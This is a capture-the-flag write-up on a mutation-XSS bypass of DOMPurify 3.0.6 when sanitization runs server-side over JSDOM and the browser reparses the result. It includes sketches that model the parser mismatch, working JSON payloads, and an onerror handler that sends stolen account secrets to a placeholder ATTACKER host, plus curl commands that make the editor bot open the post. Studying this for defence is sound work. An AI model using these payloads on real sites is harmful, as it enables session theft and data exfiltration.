Note
Exploit the parser mismatch between server-side DOMPurify/JSDOM sanitization and browser reparsing of the serialized string.
mXSS through DOMPurify + JSDOM Reparse of a "Safe" Tree
DOMPurify only guarantees that the DOM node tree it returns is safe — it does not guarantee that
the string you get back from that tree is safe to feed to an HTML parser again. When sanitization
happens server-side over JSDOM and the resulting string is later dropped into innerHTML in a real
browser, two different HTML engines touch the same bytes: JSDOM serializes, Chromium re-parses. mXSS
lives in that gap.
The trick relies on raw-text elements. Per the HTML serialization algorithm, text inside style,
script, xmp, iframe, noembed, noframes and plaintext (plus noscript when scripting is enabled) is
emitted literally, without escaping: a </style> inside a <style> text node comes out as the
raw bytes </style>, not &lt;/style&gt;. (textarea and title are escapable raw text: the serializer
escapes their text, so they do not give the same breakout.) To JSDOM that is inert character data
nested in a node. To Chromium re-parsing the string, that </style> closes the element early and
everything after it becomes live markup.
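To make the serialization rule concrete, here is a minimal sketch in plain JavaScript. It is a simplified model written for this note, not JSDOM's actual serializer: the `{ tag, children }` / `{ text }` node shape and the `serialize` and `escapeText` helpers are assumptions, and attributes and void elements are ignored.

```javascript
// Elements whose text children the HTML serialization algorithm emits literally.
// (noscript joins this set only when scripting is enabled; it is omitted here.)
const LITERAL_TEXT_PARENTS = new Set([
  'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext',
]);

// Escape text the way the serializer does for ordinary elements.
function escapeText(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/\u00a0/g, '&nbsp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hypothetical node shape: { text } for text nodes, { tag, children } for elements.
function serialize(node, parentTag = null) {
  if (typeof node.text === 'string') {
    return LITERAL_TEXT_PARENTS.has(parentTag) ? node.text : escapeText(node.text);
  }
  const inner = (node.children || []).map((c) => serialize(c, node.tag)).join('');
  return `<${node.tag}>${inner}</${node.tag}>`;
}

const breakout = { text: '</style><b>live</b>' };

console.log(serialize({ tag: 'p', children: [breakout] }));
// <p>&lt;/style&gt;&lt;b&gt;live&lt;/b&gt;</p>

console.log(serialize({ tag: 'style', children: [breakout] }));
// <style></style><b>live</b></style>
```

The same text node is harmless under `p` and a breakout under `style`; only the parent element decides whether the serializer escapes it.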
Why It Works
"Sanitized HTML string" is not a parser-independent concept. A tree that is provably safe inside JSDOM can re-materialize as active markup once a different parser reads its serialization.
DOMPurify's intended safe usage keeps everything as nodes (RETURN_DOM_FRAGMENT + replaceChildren)
so the string is never re-parsed. The bug appears when the app serializes to a string and re-parses:
// SAFE: node never re-parsed
const frag = DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true });
post.replaceChildren(frag);
// VULNERABLE: string is re-parsed by the browser
post.innerHTML = DOMPurify.sanitize(dirty);
This is forced on you when sanitization is server-side (JSDOM) and insertion is client-side: you
cannot ship a live JSDOM node across the wire, only its serialized string.
Vulnerable Pattern
Server sanitizes with DOMPurify over JSDOM and returns the serialized string; the client re-parses it.
From the Inkpress challenge (server.js):
const createDOMPurify = require('dompurify'); // 3.0.6 — pre-3.1 anti-mXSS gate
const { JSDOM } = require('jsdom');
function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  // Build the submitted JSON tree into real JSDOM nodes.
  for (const node of tree) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root); // returns a serialized STRING, not a node
}
// /p/:id page sent to the editor bot — the sanitized string is re-parsed here
const data = ${data}; // { title, html }
document.getElementById('post').innerHTML = data.html; // <-- reparse sink
Crucially the app lets you build the node tree by hand via a JSON tree of
{ tag, attrs, children } blocks (buildNode), so you control the exact node shape DOMPurify sees —
including giving a rawtext element an element child:
function buildNode(document, spec, depth) {
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  // ...attrs...
  if (Array.isArray(spec.children)) {
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  }
  return el;
}
The DOMPurify Anti-mXSS Gate (and how to skip it)
DOMPurify ≤ 3.0.x has one defense against exactly this. In _sanitizeElements it force-removes a node
whose children are text only but whose text looks like markup:
// purify.cjs.js (DOMPurify 3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)        // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);                          // <style>...</style> killed
}
A <style> whose only child is the breakout text is removed. But the gate is short-circuited the
moment the element has an element child: firstElementChild becomes non-null, so
!_isNode(currentNode.firstElementChild) is false and the whole condition fails. So:
- Give <style> a harmless surviving element child (<br>) → gate skipped, <style> survives.
- Give <style> a text node carrying </style><img ... onerror=...>. DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never stripped.
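The gate logic can be modeled without a DOM to see why one element child is enough. This is a rough sketch, not DOMPurify code: the plain-object node shape and the `textOf`, `hasElementChild` and `gateRemoves` helpers are hypothetical, and a single regex test stands in for the separate innerHTML and textContent checks (for a rawtext element with text-only children the two strings are identical).

```javascript
// Same pattern as the gate quoted above; the g flag is dropped because it is
// irrelevant for a single test.
const LOOKS_LIKE_MARKUP = /<[/\w]/;

// Hypothetical node shape: { text } for text nodes, { tag, children } for elements.
function textOf(node) {
  if (typeof node.text === 'string') return node.text;
  return (node.children || []).map(textOf).join('');
}

function hasElementChild(node) {
  return (node.children || []).some((c) => typeof c.tag === 'string');
}

// Simplified stand-in for the gate: true means the node would be force-removed.
function gateRemoves(node) {
  const children = node.children || [];
  return children.length > 0
    && !hasElementChild(node)
    && LOOKS_LIKE_MARKUP.test(textOf(node));
}

const breakout = { text: '</style><img src=1 onerror=alert(1)>' };
const textOnly = { tag: 'style', children: [breakout] };
const withElementChild = { tag: 'style', children: [breakout, { tag: 'br' }] };

console.log(gateRemoves(textOnly));         // true: gate fires, <style> is removed
console.log(gateRemoves(withElementChild)); // false: element child present, gate skipped
```

The text payload is identical in both cases; the only difference is the extra `br` sibling, which flips the second operand of the condition.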
This element-child bypass is patched in DOMPurify 3.1+.
Exploit Flow
- Confirm the sink is "sanitize server-side over JSDOM → serialize → browser re-parses via innerHTML".
- Pick a rawtext element you're allowed to emit (style here).
- Give it two children: a benign element child to defeat the anti-mXSS gate, and a text child that closes the rawtext element and injects live markup.
- Trigger the page in the victim's browser (here: request an editorial review so the bot opens /p/:id).
- In onerror, do the real work: exfiltrate the secret the bot can read.
What DOMPurify sees vs. what the browser sees
DOMPurify walks this tree and considers it clean (text is opaque inside style):
article
└─ style
├─ #text "</style><img src=1 onerror=alert(1)>" ← opaque chars to JSDOM
└─ br ← makes firstElementChild non-null
JSDOM serializes the text node literally (rawtext rule), producing:
<article><style></style><img src=1 onerror=alert(1)><br></style></article>
Chromium re-parses that string: the first </style> closes the style early, and <img> becomes a
real, live element — onerror fires.
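The browser side of the divergence can be approximated in a few lines. The sketch below is a simplified model of how an HTML tokenizer leaves a rawtext element (at the first matching end tag, regardless of what the original tree looked like); `splitRawtext` is a hypothetical helper, it assumes the input starts with an attribute-free start tag, and it ignores everything else a real parser does.

```javascript
// Split a serialized rawtext element into the text the parser keeps inside it
// and the markup that follows the first matching end tag.
function splitRawtext(html, tag) {
  const open = `<${tag}>`;
  if (!html.toLowerCase().startsWith(open)) throw new Error(`expected ${open}`);
  // An end tag is `</tag` followed by whitespace, `/` or `>` (case-insensitive);
  // anything up to the next `>` is treated as part of the end tag.
  const endTag = new RegExp(`</${tag}(?=[\\t\\n\\f />])[^>]*>`, 'i');
  const body = html.slice(open.length);
  const m = endTag.exec(body);
  if (!m) return { inside: body, after: '' };
  return {
    inside: body.slice(0, m.index),
    after: body.slice(m.index + m[0].length),
  };
}

const serialized = '<style></style><img src=1 onerror=alert(1)><br></style>';
const { inside, after } = splitRawtext(serialized, 'style');

console.log(JSON.stringify(inside)); // ""
console.log(after);                  // <img src=1 onerror=alert(1)><br></style>
```

The style element ends up empty, and the former text node is now ordinary markup that the parser continues to tokenize as tags.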
Final Payload
The JSON tree submitted to /api/posts:
[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]
Weaponized for the challenge: the editor bot carries an httpOnly session cookie and the flag is
served from /api/account ({ role, name, secret: FLAG }). After reparse, an unquoted attribute value
ends at the first space or >, so the arrow functions (=>) require the onerror value to be
double-quoted (escaped as \" inside the JSON string):
[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=\"fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))\">" },
      { "tag": "br" }
    ]
  }
]
Then publish and request a review so the bot renders it:
# publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
-d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=\"fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))\">"},{"tag":"br"}]}]}' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
# make the editor bot open it (DWELL gives the XSS time to fire)
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"
Variations
- Other elements whose text is serialized literally: xmp, iframe, noembed, noframes, and noscript when scripting is enabled. Same idea: literal serialization of inner text plus an element child to dodge the gate. textarea and title have their text escaped on serialization, so they are not candidates.
- Comment-boundary mXSS (<style><!--</style>...) and noscript/template quirks are related classes when no element-child gate is in play.
- If only attribute values serialize, remember that only quotes and & are escaped there; < and > survive, so value="</style>"-style breakouts apply.
Common Blockers
- DOMPurify 3.1+ closes the firstElementChild bypass of the gate; on patched versions look for a different serialization divergence or a different sanitizer entirely.
- If both sides use the same engine, or the output is inserted as text (textContent) rather than re-parsed, there is no gap to exploit.
- A space or > inside an unquoted onerror value ends the attribute early after reparse (a > closes the whole tag); quote the value or keep it free of both.
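The unquoted-attribute blocker is easy to check before submitting a payload. The following sketch models only the rule for where an unquoted attribute value ends (first tab, line feed, form feed or space, or a `>` that closes the tag); `unquotedValue` is a hypothetical helper, and the `/x` path is a placeholder.

```javascript
// Return the part of the input the tokenizer would keep as an unquoted
// attribute value. `afterEquals` is everything following `onerror=`.
function unquotedValue(afterEquals) {
  const m = /[\t\n\f >]/.exec(afterEquals);
  return m ? afterEquals.slice(0, m.index) : afterEquals;
}

console.log(unquotedValue('alert(1)><br>'));
// alert(1)

console.log(unquotedValue('alert(1, 2)>'));
// alert(1,

console.log(unquotedValue('fetch(`/x`).then(r=>r.text())>'));
// fetch(`/x`).then(r=
```

If the returned value differs from the handler you intended, the handler needs quoting or rewriting before it will survive the reparse.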
Good Situations To Use It
- Sanitization happens server-side over JSDOM, then the string is re-inserted via innerHTML in a browser.
- You control the node tree precisely (e.g. a JSON block builder) and rawtext elements are allowed.
- A privileged headless bot opens your content and holds a secret/cookie worth stealing.
Sources
- midnight_flag_finals_2026/web/inkpress
- DOMPurify internals & mXSS deep dives: https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes
- CVE-2024-47875 (DOMPurify nesting/mXSS class)